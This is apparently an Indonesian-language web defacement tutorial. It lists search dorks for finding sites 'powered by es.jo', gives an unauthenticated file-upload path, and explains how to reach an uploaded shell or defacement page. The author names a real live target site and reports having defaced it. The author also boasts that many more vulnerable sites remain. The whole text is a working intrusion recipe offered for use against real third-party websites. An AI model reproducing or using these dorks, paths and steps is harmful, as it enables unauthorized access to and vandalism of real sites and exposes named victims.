Bahan:
-Dork
-Exploit
-Shell / Sc Deface
Dork :
- powered by es.jo
- inurl: powered by es.jo
- All rights Reserved. Powered by es.jo
- " powered by es.jo " ©2020
(Kembangin lagi atau reverse ip live target ku masih banyak yg vuln)
Exploit:
/admin_site/upload/ahmadupload.aspx
Cara panggil/Akses:
-web.com/path/admin_site/upload/files/Shell.php
Atau
- web.com/admin_site/upload/files/Shell.php
Oke ini live target gua
https://app.qatar-basket.com/
Tampilan live target ku kek gini
Kita tambahin exploit nya di belakang site nya
contoh:
https://app.qatar-basket.com//admin_site/upload/ahmadupload.aspx
Jika seperti foto di bawah berarti vuln :v
Kalian pilih file>add>upload
Lalu tinggl kita akses shel nya cara nya
http://app.qatar-basket.com/admin_site/upload/files/Shell.php
Disini gua gak upload shel gua upload sc depes karna web yang w jadiin live target ada filter nya
https://app.qatar-basket.com/admin_site/upload/files/tokyo.html
Tags:
Deface